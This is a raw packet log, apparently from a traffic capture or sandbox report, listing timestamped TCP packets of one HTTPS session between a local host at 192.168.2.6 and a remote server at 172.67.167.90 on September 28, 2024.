Sep 28, 2024 05:23:48.664485931 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.664503098 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.664566040 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.664599895 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.664726019 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.664732933 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.664772987 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.735585928 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.735608101 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.735743999 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.735758066 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.735771894 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.735793114 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.735799074 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.735806942 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.735824108 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.735865116 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.736061096 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.736078978 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.736108065 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.736116886 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.736133099 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.736150980 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.736260891 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.736288071 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.736311913 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.736319065 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.736351967 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.736496925 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.736569881 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.736584902 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.736629963 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.736639023 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.736680031 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.750957966 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.750974894 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.751089096 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.751101017 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.751144886 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.751202106 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.751218081 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.751271963 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.751279116 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.751323938 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.751554012 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.751569986 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.751605988 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.751614094 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.751635075 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.751653910 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.822524071 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.822540998 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.822604895 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.822628975 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.822665930 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.822853088 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.822868109 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.822896957 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.822909117 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.822932959 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.822949886 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.823108912 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.823123932 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.823153019 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.823163033 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.823191881 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.823204994 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.823420048 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.823432922 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.823477983 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.823486090 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.823523998 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.823678017 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.823700905 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.823735952 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.823745012 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.823772907 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.824229956 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.837999105 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.838016033 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.838082075 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.838104010 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.838119984 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.838140011 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.838148117 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.838155985 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.838185072 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.838212013 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.838407993 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.838423014 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.838732958 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.838742018 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.838799953 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.909301043 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.909321070 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.909389973 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.909425020 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.909468889 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.909800053 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.909816980 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.909851074 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.909859896 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.909881115 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.909905910 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.910026073 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.910042048 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.910089016 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.910099030 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.910135984 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.910332918 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.910348892 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.910376072 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.910383940 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.910404921 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.910423994 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.910531998 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.910547972 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.910582066 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.910589933 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.910614014 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.910631895 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.924972057 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.924989939 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.925046921 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.925074100 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.925121069 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.925122023 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.925133944 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.925156116 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.925179958 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.925204992 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.925210953 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.925249100 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.925357103 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.925393105 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.925417900 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.925426006 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.925451994 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.925466061 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.996357918 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.996376991 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.996433020 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.996474981 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.996491909 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.996521950 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.996562004 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.996575117 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.996625900 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.996637106 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.996680975 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.996912956 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.996927977 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.996982098 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.996992111 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.997061014 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.997116089 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.997132063 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.997173071 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.997180939 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.997226954 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.997508049 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.997523069 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.997575045 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.997582912 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.997879028 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.011826992 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.011845112 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.011902094 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.011929989 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.011976957 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.012017012 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.012032986 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.012077093 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.012085915 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.012159109 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.012417078 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.012434006 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.012460947 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.012482882 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.012501001 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.012670994 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.088419914 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.088443041 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.088526964 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.088567972 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.088628054 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.088651896 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.088675976 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.088686943 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.088701963 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.088728905 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.088829994 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.088843107 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.088895082 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.088906050 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.089247942 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.089267969 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.089294910 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.089308023 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.089323997 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.089349031 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.089356899 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.089369059 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.089385033 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.089409113 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.089416981 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.089441061 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.089452982 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.098928928 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.098951101 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.098989964 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.099020004 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.099040985 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.099066973 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.099083900 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.099107027 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.099117041 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.099128962 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.099153996 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.099421024 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.099435091 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.099483967 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.099494934 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.099965096 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.175368071 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.175403118 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.175430059 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.175450087 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.175468922 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.175488949 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.175646067 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.175661087 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.175707102 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.175717115 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.175786972 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.175884962 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.175905943 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.175951004 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.175961971 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.176055908 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.176055908 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.176126957 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.176143885 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.176170111 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.176177025 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.176191092 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.176213980 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.176378965 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.176397085 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.176443100 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.176450014 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.176506996 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.185755014 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.185775042 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.185817957 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.185841084 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.186129093 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.186150074 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.186177969 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.186187029 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.186201096 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.186228037 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.186414003 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.186430931 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.186467886 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.186475992 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.187011957 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.262305975 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.262332916 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.262392044 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.262418032 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.262434006 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.262557983 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.262587070 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.262608051 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.262617111 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.262634039 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.262634039 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.262650967 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.262854099 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.262868881 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.262914896 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.262923002 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.263158083 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.263179064 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.263216972 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.263225079 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.263237953 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.263261080 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.263313055 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.263329983 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.263381958 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.263390064 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.263988972 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.272857904 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.272880077 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.272969007 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.272979021 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.272991896 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.273016930 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.273041964 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.273050070 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.273070097 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.273102999 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.273253918 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.273269892 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.273317099 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.273324966 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.273991108 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.349272966 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.349312067 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.349432945 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.349450111 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.349567890 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.349628925 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.349632978 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.349666119 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.349684954 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.349710941 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.349967003 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.350023031 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.350029945 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.350039959 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.350075960 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.350433111 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.350450993 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.350478888 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.350488901 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.350506067 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.350754976 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.350780964 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:49.350800991 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:49.350807905 CEST	443	49739	172.67.167.90	192.168.2.6
